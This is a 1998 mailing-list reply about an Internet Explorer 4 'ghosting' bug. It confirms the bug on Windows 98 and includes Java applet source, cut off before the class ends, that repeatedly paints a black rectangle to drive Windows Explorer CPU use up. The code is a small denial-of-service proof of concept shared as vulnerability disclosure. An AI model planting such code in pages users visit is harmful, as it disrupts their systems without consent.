Re: New IE4 bug w/Active Desktop installed

From: Max Vision (visionat_private)
Date: Tue Apr 21 1998 - 23:09:07 PDT

    On Tue, 21 Apr 1998, Brian Krahmer wrote:
    >   A seemingly new Internet Explorer bug has been found.  Details can be
    > found at http://www.focus-asia.com/home/tjc/ghosting/  It basically only
    > causes minor annoyances.  On my machine (nt4, sp3, ie4 4.01, active
    > desktop) it caused explore.exe (Windows Explorer) processor usage to go
    > up to about 95%.
    > brian

    This is also effective on Windows 98 (4.10.1681) _without_ active desktop.
    I thought some of the readers might appreciate source so I'm including it
    below.  Note I also decided that black was more ominous than white.  :)

    Max

    // zealand.java - implements "ghosting" for IE with Active Desktop
    import java.applet.Applet;
    import java.awt.*;
    public class zealand extends Applet
    {
        public void init()
        { apd = size();
          draw();       }
        public void paint(Graphics g)
        { update(g);    }
        public void update(Graphics g)
        { flick(g);     }
        private void draw()
        { Graphics g = getGraphics();
          update(g);
          update(g);    }
        private void flick(Graphics g)
        { g.setColor(Color.black);
          g.fillRect(0, 0, apd.width, apd.height);    }
        public zealand()
        {    }
        Dimension apd;
        int x;